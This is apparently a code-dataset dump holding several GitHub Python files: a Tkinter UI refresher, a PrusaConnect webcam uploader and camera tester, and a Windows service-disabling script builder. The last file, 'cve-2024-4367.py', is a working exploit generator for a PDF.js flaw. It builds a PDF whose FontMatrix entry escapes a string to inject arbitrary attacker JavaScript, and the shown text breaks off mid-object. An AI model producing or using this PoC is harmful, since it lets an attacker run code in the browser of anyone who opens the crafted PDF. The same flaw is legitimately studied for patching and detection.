id (int64, 0-458k) | file_name (string, 4-119 chars) | file_path (string, 14-227 chars) | content (string, 24-9.96M chars) | size (int64, 24-9.96M) | language (string, 1 class) | extension (string, 14 classes) | total_lines (int64, 1-219k) | avg_line_length (float64, 2.52-4.63M) | max_line_length (int64, 5-9.91M) | alphanum_fraction (float64, 0-1) | repo_name (string, 7-101 chars) | repo_stars (int64, 100-139k) | repo_forks (int64, 0-26.4k) | repo_open_issues (int64, 0-2.27k) | repo_license (string, 12 classes) | repo_extraction_date (string, 433 classes) |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
2,290,100 | ui_refresh.py | MNeMoNiCuZ_ImageSorting/scripts/ui_refresh.py | import tkinter as tk
from .category_buttons import update_display # Ensure this import is correct
def refresh_ui(config, image_frame, thumbnails_frame, buttons_frame, console_frame):
print("Refreshing UI...") # Debug statement
print(f"Config during refresh: {config}") # Debug statement
if 'current_image_path' in config:
update_display(config, image_frame, thumbnails_frame)
update_console(console_frame, f"Refreshed UI with current image: {config['current_image_path']}")
else:
update_console(console_frame, "No image currently loaded")
print("No image currently loaded") # Debug statement
def update_console(console_frame, message):
for widget in console_frame.winfo_children():
widget.destroy()
console_label = tk.Label(console_frame, text=message, fg="white", bg="black", anchor="w")
console_label.pack(fill=tk.BOTH)
| 916 | Python | .py | 16 | 50.625 | 106 | 0.708054 | MNeMoNiCuZ/ImageSorting | 8 | 1 | 8 | GPL-3.0 | 9/5/2024, 10:48:51 PM (Europe/Amsterdam) |
2,290,101 | CameraTester.py | BenVeghte_PrusaConnect-Webcam/CameraTester.py | import cv2
import subprocess
import os
import argparse
def verifyCamera(camera_id: str) -> bool:
    """Test to see if the camera can take a photo. Occasionally a camera will have multiple v4l devices so this makes sure you have selected the right one
    Args:
        camera_id (str): Path to the camera, relative to /dev/v4l/by-id/
    Returns:
        bool: Returns whether the camera is valid or not
    """
    camera_path = "/dev/v4l/by-id/" + camera_id
    cap = cv2.VideoCapture(camera_path)
    if cap.isOpened():
        ret, frame = cap.read()
        cap.release()
        return ret
    else:
        return False
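# Illustrative usage sketch (not part of the original script): verifyCamera()
# can be used on its own to confirm that a specific /dev/v4l/by-id/ entry really
# returns frames before wiring it into prusacam.py. The device id below is a
# placeholder and will differ on your system.
def _example_verify_camera():
    example_id = "usb-Example_Webcam-video-index0"  # hypothetical device id
    if verifyCamera(example_id):
        print(f"{example_id} produced a frame and can be used")
    else:
        print(f"{example_id} could not be opened or did not return a frame")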
def allCameraSnapshot():
"""Takes a photo with all connected USB V4L cameras (or at least tries to) and saves them so the user can figure out which camera is pointed where
"""
result = subprocess.run(["ls", "/dev/v4l/by-id/"], stdout=subprocess.PIPE).stdout.decode('utf-8').replace('\n', ' ')
v4l_devices = result.strip().split(' ')
for camera_id in v4l_devices:
camera_path = "/dev/v4l/by-id/" + camera_id
cap = cv2.VideoCapture(camera_path)
if cap.isOpened():
ret, frame = cap.read()
if ret == True:
cv2.imwrite(f"{camera_id}.jpg", frame)
print(camera_id)
cap.release()
print(f"All photos captured to {os.getcwd()}, copy the file name (minus the file extention) to the parameters of prusacam.py")
if __name__ == "__main__":
print("Taking a photo from all connected V4L cameras")
allCameraSnapshot()
| 1,581 | Python | .py | 37 | 35.432432 | 154 | 0.646592 | BenVeghte/PrusaConnect-Webcam | 8 | 1 | 1 | GPL-3.0 | 9/5/2024, 10:48:51 PM (Europe/Amsterdam) |
2,290,102 | prusacam.py | BenVeghte_PrusaConnect-Webcam/prusacam.py | import requests
import argparse
import cv2
import datetime
import pathlib
from PIL import Image
import json
import time
import os
import logging
import sys
import CameraTester
DEFAULT_MAX_IMAGES = 500
TIMESTAMP_FMT = '%Y-%m-%d_%H_%M_%S'
logger = logging.getLogger("prusacam")
logger.setLevel(logging.DEBUG)
#Can either supply configuration json file
parser = argparse.ArgumentParser(description="Use the arguments to pass the token and camera path to the script, can either use just json or the rest of them")
parser.add_argument("-t", "--token", help="Token created by Prusa Connect")
parser.add_argument("-n", "--name", help="Printer name to assist in debugging", default="printer")
parser.add_argument("-f", "--fingerprint", help="Unique fingerprint >16 characters long")
parser.add_argument("-i", "--ip", help="Local IP address of the printer to check print status")
parser.add_argument("-k", "--apikey", help="PrusaLink API key, found on printer settings page of prusa connect")
parser.add_argument("-d", "--directory", help="Absolute path to directory where to store images")
parser.add_argument("-m", "--maximages", help = "Maximum number of images for this camera to store in image folder", default = DEFAULT_MAX_IMAGES)
parser.add_argument("-j", "--json", help="Absolute file path to configuration json file", default = None)
parser.add_argument("-r", "--rotate", help="How much to rotate the image by, needs to be a multiple of 90, optional", default=0)
parser.add_argument("-c", "--camera", help="Absolute path to the camera", default=None)
def putImage(token:str, fingerprint:str, img_path:pathlib.Path) -> requests.Response|None:
"""Send the image to PrusaConnect
Args:
token (str): Camera API Token
fingerprint (str): The fingerprint set for the camera token (set at the time of the first use of the Camera API Token)
img_path (pathlib.Path): Absolute path to the photo just taken
Returns:
requests.Response: Response from the prusa servers
None: If the servers cannot be reached, return none
"""
snapshot_headers = {
'Content-Type': 'image/jpg',
'fingerprint': fingerprint,
'token': token
}
URL = "https://connect.prusa3d.com/c/snapshot"
with img_path.open(mode='rb') as f:
image = f.read()
try:
resp = requests.put(url=URL, headers=snapshot_headers, data = image)
if resp.status_code == 200: #Successful upload of image
logger.debug(f"{img_path.name} uploaded successfully")
else:
logger.exception(f"Put Image: Response Code {resp.status_code}. Content: {resp.content.decode()}")
raise ConnectionError(f"Put Image: Response Code {resp.status_code}. Content: {resp.content.decode()}")
return resp
except requests.exceptions.ConnectTimeout:
logger.warn(f"Put Image: Connection Timeout. Meaning {URL} could not be accessed")
return None
except ConnectionRefusedError:
logger.warn(f"Put Image: Connection Error. Meaning {URL} could not be accessed")
return None
except OSError:
logger.warn("Put Image: OSError. Network likely unreachable")
def getPrinterStatus(ip:str, api_key:str) -> dict:
"""Get the printer status from the PrusaLink webserver, possible statuses can be found here: https://github.com/prusa3d/Prusa-Link-Web/blob/master/spec/openapi.yaml#L1269
Args:
ip (str): IP Address of the printers PrusaLink web interface
api_key (str): PrusaLink API Key
Returns:
dict: Content of the HTTP request response
None: If the connection times out, returns None instead
"""
try:
resp = requests.get(url=f"http://{ip}/api/v1/status", headers = {"x-api-key":api_key})
#See https://github.com/prusa3d/Prusa-Link-Web/blob/master/spec/openapi.yaml#L43 for info about status codes and response format
if resp.status_code == 200:
return json.loads(resp.content)
else:
logger.exception(f"Printer Status: Response Code {resp.status_code}. Content: {resp.content.decode()}")
raise ConnectionError(f"Printer Status: Response Code {resp.status_code}. Content: {resp.content.decode()}")
except requests.exceptions.ConnectTimeout:
logger.warn(f"Printer status check timeout. IP: {ip}")
return None
except OSError:
logger.warn("Get Printer Status: OSError. Network likely unreachable")
def captureImage(camera_id:int|str, fingerprint:str, imgs_folder:pathlib.Path, rotation:int) -> pathlib.Path:
"""Take a photo with the selected webcam
Args:
camera_id (int|str): Integer of the camera as chosen by selectCamera() or the absolute path to the camera
fingerprint (str): The fingerprint set for the camera token (set at the time of the first use of the Camera API Token)
imgs_folder (pathlib.Path): Absolute path to the images folder where to save the images taken
rotation (int): Input to use with cv2.rotate. Possible: None for no rotation, cv2.ROTATE_90_CLOCKWISE, cv2.ROTATE_90_COUNTERCLOCKWISE, cv2.ROTATE_180
Returns:
pathlib.Path: Absolute path to the image just taken
"""
#Capture image
try:
cap = cv2.VideoCapture(camera_id)
if cap.isOpened():
ret, frame = cap.read()
if ret == True:
file_name = f"{fingerprint}_{datetime.datetime.now().strftime(TIMESTAMP_FMT)}.jpg"
img_path = imgs_folder/file_name
#Rotate if desired
if rotation is not None:
frame = cv2.rotate(frame, rotation)
cv2.imwrite(img_path, frame)
logger.debug(f"Saved image {img_path.name}")
cap.release()
return img_path
else:
logger.warn(f"Unable to open video capture {camera_id}")
except UnboundLocalError: # Can't capture an image, so there is no image path to return
return None
def selectCamera(name:str) -> int:
"""Run at the beginning of everytime the script is run to select the correct camera
Args:
name (str): Name of the printer to help with debugging and identifying which script is being run
Returns:
int: The camera number to use with cv2.VideoCapture
"""
# Camera Selection
camera_id = -1
found = False
for i in range(10):
cap = cv2.VideoCapture(i)
if cap.read()[0]:
valid = False
while valid is False:
inp = input("Is the light on the desired camera on? y/n: ")
if inp.strip().lower() == "y" or inp.strip().lower() == "yes":
camera_id = i
valid = True
elif inp.strip().lower() == "n" or inp.strip().lower() == "no":
valid = True
else:
print("Invalid input, please try again, yes or no.")
cap.release()
if camera_id != -1:
break
if camera_id == -1:
print("No camera chosen, please check the connections")
else:
print(f"Camera {camera_id} chosen for printer {name}")
return camera_id
def deleteImages(imgs_folder:pathlib.Path,fingerprint:str, max_images:int):
""" Delete old images so as not to risk maxing out the storage
Args:
imgs_folder (pathlib.Path): Absolute path to the images folder where to save the images taken
fingerprint (str): The fingerprint set for the camera token (set at the time of the first use of the Camera API Token)
max_images (int): Max number of images allowed to be stored for this printer
"""
imgs = list(imgs_folder.glob(f"{fingerprint}_*.jpg"))
if len(imgs) > max_images:
sorted_imgs = sorted(imgs, key = lambda x: datetime.datetime.strptime(x.stem[len(fingerprint)+1:], TIMESTAMP_FMT))
for img in sorted_imgs[:-max_images]:
img.unlink()
logger.debug(f"Deleted {len(imgs)-max_images} image(s)")
def uncaughtExceptionsHandler(exc_type, exc_value, exc_traceback):
"""Make sure all exceptions get put in the log file for easy debugging
"""
if issubclass(exc_type, KeyboardInterrupt):
sys.__excepthook__(exc_type, exc_value, exc_traceback)
return
else:
logger.critical("Unhandled exception", exc_info=(exc_type, exc_value, exc_traceback))
sys.__excepthook__(exc_type, exc_value, exc_traceback)
return
if __name__ == "__main__":
sys.excepthook = uncaughtExceptionsHandler
#Argparse
args = parser.parse_args()
##Parse json file if its given
if args.json is not None:
with open(args.json) as f:
config = json.load(f)
printer_name = config["name"]
fh = logging.FileHandler(f"{printer_name}.log")
fh.setLevel(logging.DEBUG)
formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s', datefmt='%m/%d/%Y %H:%M:%S')
fh.setFormatter(formatter)
logger.addHandler(fh)
token = config["token"]
fingerprint = config["fingerprint"]
if len(fingerprint) < 16:
raise ValueError("Fingerprint needs to be longer than 16 characters")
ip = config["ip"]
pl_api_key = config["apikey"]
imgs_folder = pathlib.Path(config["directory"])
try:
possible_rot = [None, cv2.ROTATE_90_CLOCKWISE, cv2.ROTATE_180, cv2.ROTATE_90_COUNTERCLOCKWISE]
if int(config["rotate"]/90) == config["rotate"]/90:
rot_ind = int(config["rotate"]/90)
image_rotation = possible_rot[rot_ind]
else:
raise TypeError(f"User input ({config['rotate']}) is not allowed, needs to be a multiple of 90")
except KeyError:
image_rotation = None
#Max Images
try:
max_images = config["maximages"]
except KeyError:
max_images = DEFAULT_MAX_IMAGES
#Image Folder
if imgs_folder.exists():
if imgs_folder.is_file():
raise FileExistsError("Directory input already exists as a file, needs to be a folder")
else:
imgs_folder.mkdir(parents=True)
#Select Camera
try:
camera_id = config["camera"]
ret = CameraTester.verifyCamera(camera_id)
if ret is False:
raise ConnectionError("Argument supplied camera path is invalid, please select the camera manually by not passing in argument to -c or --camera or try a different absolute path. \n Sometimes cameras create multiple v4l devices so try other indicies (see readme)")
else:
camera_id = "/dev/v4l/by-id/" + camera_id
except KeyError:
camera_id = selectCamera(printer_name)
##JSON args is not passed
else:
printer_name = args.name
fh = logging.FileHandler(f"{printer_name}.log")
fh.setLevel(logging.DEBUG)
formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s', datefmt='%m/%d/%Y %H:%M:%S')
fh.setFormatter(formatter)
logger.addHandler(fh)
token = args.token
fingerprint = args.fingerprint
possible_rot = [None, cv2.ROTATE_90_CLOCKWISE, cv2.ROTATE_180, cv2.ROTATE_90_COUNTERCLOCKWISE]
if int(args.rotate) == float(args.rotate):
if int(int(args.rotate)/90) == int(args.rotate)/90:
rot_ind = int(int(args.rotate)/90)
image_rotation = possible_rot[rot_ind]
else:
raise TypeError(f"User input ({args.rotate}) is not allowed, needs to be a multiple of 90")
else:
raise TypeError(f"User input ({args.rotate}) is not allowed, needs to be a multiple of 90")
if len(fingerprint) < 16:
raise ValueError("Fingerprint needs to be longer than 16 characters")
ip = args.ip
pl_api_key = args.apikey
imgs_folder = pathlib.Path(args.directory)
max_images = int(args.maximages)
if imgs_folder.exists():
if imgs_folder.is_file():
raise FileExistsError("Directory input already exists as a file, needs to be a folder")
else:
imgs_folder.mkdir(parents=True)
#Select Camera
if args.camera is None:
camera_id = selectCamera(printer_name)
else:
camera_id = args.camera
ret = CameraTester.verifyCamera(camera_id)
if ret is False:
raise ConnectionError("Argument supplied camera path is invalid, please select the camera manually by not passing in argument to -c or --camera or try a different absolute path. \n Sometimes cameras create multiple v4l devices so try other indicies (see readme)")
#Infinite loop to get photos, and check printer status
status = getPrinterStatus(ip, pl_api_key)
if status is None: #Means the software couldn't connect to the printer
printer_status = "IDLE"
else:
printer_status = status["printer"]["state"]
while True:
count = 0
# Possible printer statuses can be found here: https://github.com/prusa3d/Prusa-Link-Web/blob/master/spec/openapi.yaml#L1269
#If the printer is printing
while printer_status == "PRINTING":
status = getPrinterStatus(ip, pl_api_key)
if status is not None: #If the status check works properly change the state, otherwise do nothing
printer_status = status["printer"]["state"]
img_path = captureImage(camera_id, fingerprint, imgs_folder, image_rotation)
if img_path is not None: #If the image was saved properly
putImage(token, fingerprint, img_path)
#Delete images every so often to reduce CPU load
count += 1
if count > 20:
count = 0
deleteImages(imgs_folder, fingerprint, max_images)
time.sleep(60)
#Printer is in any other state
while printer_status != "PRINTING":
status = getPrinterStatus(ip, pl_api_key)
if status is not None: #If the status check works properly change the state, otherwise do nothing
printer_status = status["printer"]["state"]
img_path = captureImage(camera_id, fingerprint, imgs_folder, image_rotation)
if img_path is not None:
putImage(token, fingerprint, img_path)
#Delete images every so often to reduce CPU load
count += 1
if count > 20:
count = 0
deleteImages(imgs_folder, fingerprint, max_images)
time.sleep(120)
| 14,948 | Python | .py | 294 | 41.064626 | 279 | 0.644571 | BenVeghte/PrusaConnect-Webcam | 8 | 1 | 1 | GPL-3.0 | 9/5/2024, 10:48:51 PM (Europe/Amsterdam) |
2,290,103 | consts.py | valleyofdoom_service-list-builder/service_list_builder/consts.py | VERSION = "1.6.3"
USER_MODE_TYPES = {16, 32, 96, 288, 80, 272}
HIVE = "SYSTEM\\CurrentControlSet"
LOAD_HIVE_LINES = f"""@echo off
REM This script was built using service-list-builder v{VERSION}
REM ---> IMPORTANT: Do NOT run this script on any system other than the one it was generated on <---
REM Set drive letter to target
set "DRIVE_LETTER=C"
if not "%DRIVE_LETTER%" == "C" (
reg load "HKLM\\tempSYSTEM" "%DRIVE_LETTER%:\\Windows\\System32\\config\\SYSTEM"
if not %errorlevel% == 0 (echo error: failed to load SYSTEM hive && pause && exit /b 1)
set "HIVE=tempSYSTEM\\ControlSet001"
) else (
set "HIVE={HIVE}"
)
reg query "HKLM\\%HIVE%" > nul 2>&1 || echo error: hive not exists or is unloaded && pause && exit /b 1
"""
# use lowercase key as the path will be converted to lowercase when comparing
IMAGEPATH_REPLACEMENTS = {
"\\systemroot\\": "C:\\Windows\\",
"system32\\": "C:\\Windows\\System32\\",
"\\??\\": "",
}
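# Illustrative sketch (not part of the original module): how a service ImagePath
# such as "\\SystemRoot\\System32\\drivers\\example.sys" might be normalised with
# the table above -- lowercase the path, then swap a matching prefix. The helper
# name is hypothetical; main.py performs a similar substitution.
def _example_normalise_imagepath(image_path: str) -> str:
    lowered = image_path.lower()
    for prefix, replacement in IMAGEPATH_REPLACEMENTS.items():
        if lowered.startswith(prefix):
            return replacement + lowered[len(prefix):]
    return lowered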
| 953 | Python | .py | 23 | 39 | 103 | 0.67027 | valleyofdoom/service-list-builder | 8 | 3 | 0 | GPL-3.0 | 9/5/2024, 10:48:51 PM (Europe/Amsterdam) |
2,290,104 | main.py | valleyofdoom_service-list-builder/service_list_builder/main.py | import argparse
import ctypes
import logging
import os
import re
import sys
import winreg
from collections import deque
from configparser import ConfigParser, SectionProxy
from datetime import datetime
from typing import Any
import pywintypes
import win32api
import win32service
import win32serviceutil
from consts import HIVE, IMAGEPATH_REPLACEMENTS, LOAD_HIVE_LINES, USER_MODE_TYPES, VERSION
LOG_CLI = logging.getLogger("CLI")
def read_value(path: str, value_name: str) -> Any | None:
try:
with winreg.OpenKey(
winreg.HKEY_LOCAL_MACHINE,
path,
0,
winreg.KEY_READ | winreg.KEY_WOW64_64KEY,
) as key:
return winreg.QueryValueEx(key, value_name)[0]
except FileNotFoundError:
return None
def get_dependencies(service: str, kernel_mode: bool) -> set[str]:
dependencies: list[str] | None = read_value(
f"{HIVE}\\Services\\{service}",
"DependOnService",
)
# base case
if dependencies is None or len(dependencies) == 0:
return set()
if not kernel_mode:
# remove kernel-mode services from dependencies list so we are left with
# user-mode dependencies only
dependencies = [
dependency
for dependency in dependencies
if read_value(f"{HIVE}\\Services\\{dependency}", "Type") in USER_MODE_TYPES
]
child_dependencies = {
child_dependency
for dependency in dependencies
for child_dependency in get_dependencies(dependency, kernel_mode)
}
return set(dependencies).union(child_dependencies)
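# Illustrative usage sketch (not part of the original module): resolving the
# user-mode dependency tree for one service. The service name below is only an
# example and must exist under HKLM\SYSTEM\CurrentControlSet\Services.
def _example_get_dependencies():
    deps = get_dependencies("LanmanWorkstation", kernel_mode=False)  # example service name
    print(f"user-mode dependencies: {', '.join(sorted(deps)) or 'none'}")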
def get_present_services() -> dict[str, str]:
# keeps track of service in lowercase (key) and actual service name (value)
present_services: dict[str, str] = {}
with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, f"{HIVE}\\Services") as key:
num_subkeys = winreg.QueryInfoKey(key)[0]
for i in range(num_subkeys):
service_name = winreg.EnumKey(key, i)
# handle (remove) user ID in service name
if "_" in service_name:
service_name_without_id = service_name.rpartition("_")[0]
is_service_exists = service_name_without_id.lower() in present_services
if is_service_exists:
LOG_CLI.debug('removing "_" in "%s"', service_name)
service_name = service_name_without_id
present_services[service_name.lower()] = service_name
return present_services
def parse_config_list(
service_list: SectionProxy,
present_services: dict[str, str],
) -> set[str]:
return {
present_services[lower_service]
for service in service_list
if (lower_service := service.lower()) in present_services
}
def get_file_metadata(file_path: str, attribute: str) -> str:
lang, code_page = win32api.GetFileVersionInfo(file_path, "\\VarFileInfo\\Translation")[0]
file_info_key = f"\\StringFileInfo\\{lang:04x}{code_page:04x}\\"
product_name = win32api.GetFileVersionInfo(file_path, f"{file_info_key}{attribute}")
if not product_name:
return ""
return str(product_name)
def parse_args() -> argparse.Namespace:
parser = argparse.ArgumentParser()
group = parser.add_mutually_exclusive_group(required=True)
group.add_argument(
"--config",
metavar="<config>",
type=str,
help="path to lists config file",
)
group.add_argument(
"--get-dependencies",
metavar="<service>",
type=str,
help="returns the entire dependency tree for a given service",
)
parser.add_argument(
"--disable-running",
help="only disable services specified in the list that are currently running",
action="store_true",
)
parser.add_argument(
"--kernel-mode",
help="includes kernel-mode services in the dependency tree when using --get-dependencies",
action="store_true",
)
parser.add_argument(
"--disable-service-warning",
help="disable the non-Windows services warning",
action="store_true",
)
args = parser.parse_args()
if args.kernel_mode and not args.get_dependencies:
parser.error("--kernel-mode can only be used with --get_dependencies")
if args.disable_running and not args.config:
parser.error("--disable-running can only be used with --config")
return args
def is_windows_service(service_name: str) -> bool | None:
image_path = read_value(f"{HIVE}\\Services\\{service_name}", "ImagePath")
if image_path is None:
LOG_CLI.info('unable to get image path for "%s"', service_name)
return None
path_match = re.match(r".*?\.(exe|sys)\b", image_path, re.IGNORECASE)
if path_match is None:
LOG_CLI.error('image path match failed for "%s"', image_path)
return None
# expand vars
binary_path: str = os.path.expandvars(path_match[0])
lower_binary_path = binary_path.lower()
# resolve paths
if lower_binary_path.startswith('"'):
lower_binary_path = lower_binary_path[1:]
for starts_with, replacement in IMAGEPATH_REPLACEMENTS.items():
if lower_binary_path.startswith(starts_with):
lower_binary_path = lower_binary_path.replace(starts_with, replacement)
if not os.path.exists(lower_binary_path):
LOG_CLI.info('unable to get binary path for "%s"', service_name)
return None
try:
company_name = get_file_metadata(lower_binary_path, "CompanyName")
if not company_name:
raise pywintypes.error
except pywintypes.error:
LOG_CLI.info('unable to get CompanyName for "%s"', service_name)
return None
return company_name == "Microsoft Corporation"
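# Illustrative usage sketch (not part of the original module): is_windows_service()
# returns True for binaries whose CompanyName is "Microsoft Corporation", False for
# third-party services, and None when the vendor cannot be determined. The service
# name below is only an example.
def _example_is_windows_service():
    verdict = is_windows_service("Spooler")  # example service name
    if verdict is None:
        print("vendor unknown")
    else:
        print("Windows service" if verdict else "third-party service")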
def main() -> int:
logging.basicConfig(format="[%(name)s] %(levelname)s: %(message)s", level=logging.INFO)
present_services = get_present_services()
print(
f"service-list-builder Version {VERSION} - GPLv3\n",
)
if not ctypes.windll.shell32.IsUserAnAdmin():
LOG_CLI.error("administrator privileges required")
return 1
if getattr(sys, "frozen", False):
os.chdir(os.path.dirname(sys.executable))
elif __file__:
os.chdir(os.path.dirname(__file__))
args = parse_args()
if args.get_dependencies:
lower_get_dependencies = args.get_dependencies.lower()
if lower_get_dependencies not in present_services:
LOG_CLI.error("%s not exists as a service", args.get_dependencies)
return 1
dependencies = {
present_services[dependency.lower()]
for dependency in get_dependencies(args.get_dependencies, args.kernel_mode)
}
service_name = present_services[lower_get_dependencies]
print(
(
f"{service_name} has 0 dependencies"
if len(dependencies) == 0
else f"{service_name} depends on {', '.join(dependencies)}"
),
)
return 0
if not os.path.exists(args.config):
LOG_CLI.error("config file %s not found", args.config)
return 1
config = ConfigParser(
allow_no_value=True,
delimiters=("="),
inline_comment_prefixes="#",
)
# prevent lists imported as lowercase
config.optionxform = lambda optionstr: optionstr
config.read(args.config)
# load sections from config and handle case insensitive entries
enabled_services = parse_config_list(config["enabled_services"], present_services)
individual_disabled_services = parse_config_list(
config["individual_disabled_services"],
present_services,
)
rename_binaries = {binary for binary in config["rename_binaries"] if binary != ""}
# start service_dump with the individual disabled services section
service_dump: set[str] = individual_disabled_services.copy()
# check dependencies
has_dependency_errors = False
# required for lowercase comparison
lower_services_set: set[str] = {service.lower() for service in enabled_services}
if enabled_services:
# populate service_dump with all user mode services that are not in enabled_services section
for lower_service_name, service_name in present_services.items():
# don't add services that the user wants to keep enabled in the service dump
if lower_service_name in lower_services_set:
continue
service_type = read_value(f"{HIVE}\\Services\\{service_name}", "Type")
if service_type is not None:
service_type = int(service_type)
if service_type in USER_MODE_TYPES:
service_dump.add(service_name)
dependencies_to_resolve: set[str] = set()
for service in enabled_services:
# get a set of the dependencies in lowercase
dependencies = {service.lower() for service in get_dependencies(service, kernel_mode=False)}
# check which dependencies are not in the user's list
# then get the actual name from present_services as it was converted to lowercase to handle case inconsistency in Windows
missing_dependencies = {
present_services[dependency] for dependency in dependencies.difference(lower_services_set)
}
if len(missing_dependencies) > 0:
has_dependency_errors = True
LOG_CLI.error("%s depends on %s", service, ", ".join(missing_dependencies))
dependencies_to_resolve.update(missing_dependencies)
# check for services that depend on ones that are getting disabled
requiredby_services: dict[str, set[str]] = {}
for lower_service_name, service_name in present_services.items():
# don't consider services that are getting disabled
if service_name in service_dump:
continue
dependencies = {service.lower() for service in get_dependencies(service_name, kernel_mode=True)}
for dependency in dependencies:
# somehow some services can depend on non-installed services...?
if dependency not in present_services:
continue
dependency_service_name = present_services[dependency]
is_usermode_service = read_value(f"{HIVE}\\Services\\{dependency_service_name}", "Type") in USER_MODE_TYPES
if (
enabled_services
and is_usermode_service
and dependency_service_name not in enabled_services
or dependency_service_name in individual_disabled_services
):
has_dependency_errors = True
if dependency_service_name in requiredby_services:
requiredby_services[dependency_service_name].add(service_name)
else:
requiredby_services[dependency_service_name] = {service_name}
for service, requiredby_service in requiredby_services.items():
LOG_CLI.error("%s is required by %s", service, ", ".join(requiredby_service))
dependencies_to_resolve.add(service)
if dependencies_to_resolve:
print() # new line to separate logs
for service in dependencies_to_resolve:
if service in individual_disabled_services:
LOG_CLI.info("remove %s from [individual_disabled_services] to fix dependency errors", service)
is_usermode_service = read_value(f"{HIVE}\\Services\\{service}", "Type") in USER_MODE_TYPES
if enabled_services and is_usermode_service:
LOG_CLI.info("add %s to [enabled_services] to fix dependency errors", service)
if has_dependency_errors:
return 1
if not args.disable_service_warning:
# check if any services are non-Windows services as the user
# likely does not want to disable these
non_microsoft_service_count = 0
unknown_company_service_count = 0
for service_name in service_dump:
is_win_service = is_windows_service(service_name)
if is_win_service is None:
unknown_company_service_count += 1
continue
if not is_win_service:
LOG_CLI.info('"%s" is not a Windows service', service_name)
non_microsoft_service_count += 1
if non_microsoft_service_count + unknown_company_service_count != 0:
print(
f"\n{non_microsoft_service_count} non-Windows services detected, {unknown_company_service_count} service vendors are unknown. are you sure you want to disable these?\nedit the config or use --disable-service-warning to suppress this warning if this is intentional"
)
return 1
if args.disable_running:
for service in service_dump.copy():
if not win32serviceutil.QueryServiceStatus(service)[1] == win32service.SERVICE_RUNNING:
service_dump.remove(service)
# store contents of batch scripts
ds_lines: deque[str] = deque()
es_lines: deque[str] = deque()
for binary in rename_binaries:
if os.path.exists(f"C:{binary}"):
file_name = os.path.basename(binary)
file_extension = os.path.splitext(file_name)[1]
if file_extension == ".exe":
# processes should be killed before being renamed
ds_lines.append(f"taskkill /f /im {file_name}")
last_index = binary[-1] # .exe gets renamed to .exee
ds_lines.append(f'REN "%DRIVE_LETTER%:{binary}" "{file_name}{last_index}"')
es_lines.append(f'REN "%DRIVE_LETTER%:{binary}{last_index}" "{file_name}"')
else:
LOG_CLI.info("item does not exist: %s... skipping", binary)
with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, f"{HIVE}\\Control\\Class") as key:
num_subkeys = winreg.QueryInfoKey(key)[0]
for i in range(num_subkeys):
filter_id = winreg.EnumKey(key, i)
for filter_type in ("LowerFilters", "UpperFilters"):
original: list[str] | None = read_value(
f"{HIVE}\\Control\\Class\\{filter_id}",
filter_type,
)
# check if the filter exists
if original is not None:
new = original.copy() # to keep a backup of the original
for driver in original:
if driver in service_dump:
new.remove(driver)
# check if original was modified at all
if original != new:
ds_lines.append(
f'reg.exe add "HKLM\\%HIVE%\\Control\\Class\\{filter_id}" /v "{filter_type}" /t REG_MULTI_SZ /d "{"\\0".join(new)}" /f',
)
es_lines.append(
f'reg.exe add "HKLM\\%HIVE%\\Control\\Class\\{filter_id}" /v "{filter_type}" /t REG_MULTI_SZ /d "{"\\0".join(original)}" /f',
)
for service in sorted(service_dump, key=str.lower):
original_start_value = read_value(f"{HIVE}\\Services\\{service}", "Start")
if original_start_value is not None:
ds_lines.append(
f'reg.exe add "HKLM\\%HIVE%\\Services\\{service}" /v "Start" /t REG_DWORD /d "4" /f',
)
es_lines.append(
f'reg.exe add "HKLM\\%HIVE%\\Services\\{service}" /v "Start" /t REG_DWORD /d "{original_start_value}" /f',
)
if not ds_lines:
LOG_CLI.info("there are no changes to write to the scripts")
return 0
for script_lines in (ds_lines, es_lines):
for line in LOAD_HIVE_LINES.split("\n")[::-1]:
script_lines.appendleft(line)
script_lines.append("shutdown /r /f /t 0")
current_time = datetime.now()
if not os.path.exists("build"):
os.mkdir("build")
build_dir = os.path.join("build", f"build-{current_time.strftime("%d%m%y%H%M%S")}")
os.makedirs(build_dir)
with open(os.path.join(build_dir, "Services-Disable.bat"), "w", encoding="utf-8") as file:
for line in ds_lines:
file.write(f"{line}\n")
with open(os.path.join(build_dir, "Services-Enable.bat"), "w", encoding="utf-8") as file:
for line in es_lines:
file.write(f"{line}\n")
LOG_CLI.info("done - scripts built in .\\%s", build_dir)
return 0
if __name__ == "__main__":
sys.exit(main())
| 16,598 | Python | .py | 355 | 37.11831 | 280 | 0.630479 | valleyofdoom/service-list-builder | 8 | 3 | 0 | GPL-3.0 | 9/5/2024, 10:48:51 PM (Europe/Amsterdam) |
2,290,105 | cve-2024-4367.py | Zombie-Kaiser_cve-2024-4367-PoC-fixed/cve-2024-4367.py | import sys
def generate_payload(payload):
    escaped_payload = payload.replace('(', '\\(').replace(')', '\\)')
    return f"""
%PDF-1.4
%DUMMY
8 0 obj
<<
/PatternType 2
/Shading<<
/Function<<
/Domain[0 1]
/C0[0 0 1]
/C1[1 0.6 0]
/N 1
/FunctionType 2
>>
/ShadingType 2
/Coords[46 400 537 400]
/Extend[false false]
/ColorSpace/DeviceRGB
>>
/Type/Pattern
>>
endobj
5 0 obj
<<
/Widths[573 0 582 0 548 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 573 0 573 0 341]
/Type/Font
/BaseFont/PAXEKO+SourceSansPro-Bold
/LastChar 102
/Encoding/WinAnsiEncoding
/FontMatrix [0.1 0 0 0.1 0 (1\\);\n{escaped_payload}\n//)]
/Subtype/Type1
/FirstChar 65
/FontDescriptor 9 0 R
>>
endobj
2 0 obj
<<
/Kids[3 0 R]
/Type/Pages
/Count 1
>>
endobj
9 0 obj
<<
/Type/FontDescriptor
/ItalicAngle 0
/Ascent 751
/FontBBox[-6 -12 579 713]
/FontName/PAXEKO+SourceSansPro-Bold
/StemV 100
/CapHeight 713
/Flags 32
/FontFile3 10 0 R
/Descent -173
/MissingWidth 250
>>
endobj
6 0 obj
<<
/Length 128
>>
stream
47 379 489 230 re S
/Pattern cs
BT
50 500 Td
117 TL
/F1 150 Tf
/P1 scn
(AbCdEf) Tj
/P2 scn
(AbCdEf) '
ET
endstream
endobj
3 0 obj
<<
/Type/Page
/Resources 4 0 R
/Contents 6 0 R
/Parent 2 0 R
/MediaBox[0 0 595.2756 841.8898]
>>
endobj
10 0 obj
<<
/Length 800
/Subtype/Type2
>>
stream
endstream
endobj
7 0 obj
<<
